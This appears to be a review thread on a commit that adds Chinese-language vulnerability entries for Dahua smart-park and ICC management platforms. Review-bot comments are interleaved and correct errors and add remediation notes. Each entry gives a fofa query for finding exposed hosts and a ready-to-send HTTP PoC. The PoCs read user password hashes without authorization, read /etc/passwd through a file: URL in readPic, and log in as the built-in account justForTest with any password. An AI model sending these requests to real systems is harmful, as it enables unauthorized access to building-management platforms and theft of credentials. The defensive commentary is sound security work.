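Review bot: this is the same request as 大华智慧园区综合管理平台 searchJson SQL注入漏洞.md earlier in the commit (only `md5(1)` versus `md5(388609)` differs); merge them into one entry, and this one has the correct title since `pageJson` is where the `orderBy` probe sits. Together with the getNewStaypointDetailQuery entry that makes three carQuery operations whose injection point is the `orderBy` value in `pageJson`, which is worth stating explicitly: it tells a defender the fix is one server-side whitelist on the sort column, and it gives a single log signature (`updatexml(` inside a `pageJson` path segment or element) for all of them. The entry still has no description sentence.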
@@ -0,0 +1,21 @@
## 大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调 配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管 理需求,同时通过提供智能服务,增强使用体验。

由于该平台未对接口权限做限制,攻击者可以从 user_getUserInfoByUserName.action 接口获取任意用户密码(MD5 格式)。

## fofa

```
body="src=/WPMS/asset/common/js/jsencrypt.min.js"
```

## poc

```
GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1
Host: xxxxxxxxx
Cookie: JSESSIONID=D99F6DAEA7EC0695266E95A1B1A529CC
```


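Review bot: the title and description say the endpoint is reachable without authorization (未授权), yet the request carries a `JSESSIONID` cookie from a live session. Either the cookie is irrelevant, in which case remove it (session identifiers should not be committed in any case), or the call needs an authenticated session, in which case the title overstates the issue. The description has mid-word spaces from a copied PDF ("资源调 配", "管 理需求") that should be closed up. For the defensive record it should also say what the response contains (the description states MD5 password hashes for the queried `userName`), since exposure of password hashes is the fact that drives the severity and the remediation: an access check on the `/admin/` action.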
27
大华/大华智能物联ICC综合管理平台readpic任意文件读取漏洞.md
Normal file
@@ -0,0 +1,27 @@

## 大华智能物联ICC综合管理平台readpic任意文件读取漏洞
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台的 "readpic" 接口存在一个任意文件读取漏洞,恶意攻击者可通过文件读取漏洞进行访问和读取系统中的文件,包括配置文件、日志和其他敏感数据,从而利用攻击。

## fofa
```
:body="*客户端会小于800*"
```

## poc
```
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/2
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
If-None-Match: W/"63ba2750-93e"
Te: trailers
```


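Review bot: the title is about the ICC智能物联综合管理平台 but the description's first sentence describes the 智慧园区综合管理平台 (copied from the user_getUserInfoByUserName entry); fix the product name. The fofa query has a stray leading `:`. `If-None-Match: W/"63ba2750-93e"` is an ETag captured from a real host; it adds nothing and can make the server answer 304 with no body, hiding the very content the PoC is meant to show, so drop it along with the browser-only `Sec-Fetch-*` headers. `HTTP/2` in the request line does not match the HTTP/1.1 framing. The description ends in the fragment "从而利用攻击"; finish the sentence, and name the parameter (`fileUrl`) and the fact that it accepts a `file:` scheme, which is what the server-side fix must reject.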
23
大华/大华智能物联综合管理平台justForTest用户登录漏洞.md
Normal file
@@ -0,0 +1,23 @@
## 大华智能物联综合管理平台justForTest用户登录漏洞
浙江大华技术股份有限公司智能物联综合管理平台 用户登录接口/evo-apigw/evo-oauth/oauth/token存在漏洞,使用用户justForTest/任意密码即可成功登录平台,造成信息泄露。

## fofa
```
icon_hash="-1935899595"body="*客户端会小于800*"
```

## poc
```
POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Content-Length: 109
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
```
出现各种token证明漏洞存在


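Review bot: the fofa query `icon_hash="-1935899595"body="*客户端会小于800*"` is missing the `&&` between its two terms and will be rejected as written. "出现各种token证明漏洞存在" should name the response field that counts as success rather than "various tokens". The description already has the key defensive facts, a built-in account `justForTest` that the `/evo-apigw/evo-oauth/oauth/token` endpoint accepts with any password; add that remediation is removing or disabling that account, and that `username=justForTest` in token-endpoint request logs is a direct indicator of attempted or successful use. The closing image is empty.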